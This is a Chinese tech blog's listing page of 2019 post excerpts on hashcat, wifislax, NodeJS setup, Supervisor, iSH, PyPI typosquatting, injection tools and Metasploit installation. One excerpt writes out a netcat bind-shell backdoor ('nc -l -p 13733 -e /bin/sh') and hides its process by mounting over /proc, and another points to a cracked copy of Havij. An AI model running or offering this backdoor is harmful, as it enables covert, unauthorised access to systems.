上一页 1 ··· 16 17 18 19 20 21 22 23 24 ··· 26 下一页
摘要: 最新版本V5.0.0下载地址: 可执行程序:https://hashcat.net/files/hashcat-5.0.0.7z 源代码:https://hashcat.net/files/hashcat-5.0.0.tar.gz 开发版:github.com/hashcat/hashcat GPU 阅读全文
posted @ 2019-01-21 15:10 heycomputer 阅读(6111) 评论(0) 推荐(0)
摘要: Despues de 7 meses , sale una version nueva de wifislax64 , la version 1.1.Esta sigue utilizando como base slackware64-14.2 + actualizaciones de segur 阅读全文
posted @ 2019-01-21 15:09 heycomputer 阅读(1432) 评论(0) 推荐(0)
摘要: 需求: 之前使用 PHP+Mysql 做开发,近年来NodeJS有点火,且不需要Apache、Nginx、Tomcat做容器,想在不影响之前PHP开发环境下,也能体验NodeJS+Mysql玩法。国内搜索了很多也没有发现有关LNMP+Nodejs的具体部署教程,于是踩了很多坑,终于配出了NodeJS 阅读全文
posted @ 2019-01-21 15:08 heycomputer 阅读(397) 评论(0) 推荐(0)
摘要: 1. 运行后门nohup nc -l -p 13733 -e /bin/sh& 2.ps aux |grep ‘/bin/sh’ 查找进程PIDmkdir /tmp/emptymount –bind /tmp/empty /proc/进程PID 3.cat /proc/$$/mountinfo 查看 阅读全文
posted @ 2019-01-21 15:07 heycomputer 阅读(4792) 评论(0) 推荐(0)
摘要: Supervisor是一个进程监控程序。 需求一:我现在有一个进程需要每时每刻不断的跑,但是这个进程又有可能由于各种原因有可能中断。当进程中断的时候我希望能自动重新启动它,此时,我就需要使用到了Supervisor 先弄懂两个命令:supervisord : supervisor的服务器端部分,启动 阅读全文
posted @ 2019-01-21 15:06 heycomputer 阅读(2501) 评论(0) 推荐(0)
摘要: 你可曾想过在IOS设备上运行Linux系统?或者用shell来传输文件、编写脚本,又或者使用Vi来开发代码? Here is a good news,现在有了一个叫iSH的东西,你可以使用它在IOS设备上来进行上述操作。 iSH是一个使用usermode x86模拟器将Linux shell引入IO 阅读全文
posted @ 2019-01-21 15:05 heycomputer 阅读(3984) 评论(0) 推荐(0)
摘要: 转自:http://blog.fatezero.org/2017/06/01/package-fishing/ 使用pip install安装软件包时,大多数人不清楚自己所需的python模块在哪个软件包中,有时候甚至是模糊搜索安装,这就给恶意利用的人提供的机会,本文将描述如何利用PyPI的安装源散 阅读全文
posted @ 2019-01-21 15:04 heycomputer 阅读(565) 评论(0) 推荐(0)
摘要: 注入工具推荐 SQLMAP:https://github.com/sqlmapproject/sqlmap Havij破解版:Havij-1.15-pro 一、VulHub:(多种应用系统漏洞测试靶场) # Install pipcurl -s https://bootstrap.pypa.io/g 阅读全文
posted @ 2019-01-21 14:58 heycomputer 阅读(6233) 评论(1) 推荐(1)
摘要: 1. http://www.commandline.co.uk/ https://github.com/ritchielawrence/cmdow/tarball/master 2. g++ -O2 -s -Wall -c -o wlist.o wlist.cpp -fpermissive g++ 阅读全文
posted @ 2019-01-20 21:50 heycomputer 阅读(164) 评论(0) 推荐(0)
摘要: 1.下载ruby for windows https://rubyinstaller.org/downloads/ Metasploit-Framework 5.0 需要ruby 2.4.5这版本支持。其他均不可。 https://github.com/oneclick/rubyinstaller2 阅读全文
posted @ 2019-01-15 22:08 heycomputer 阅读(2496) 评论(0) 推荐(0)
上一页 1 ··· 16 17 18 19 20 21 22 23 24 ··· 26 下一页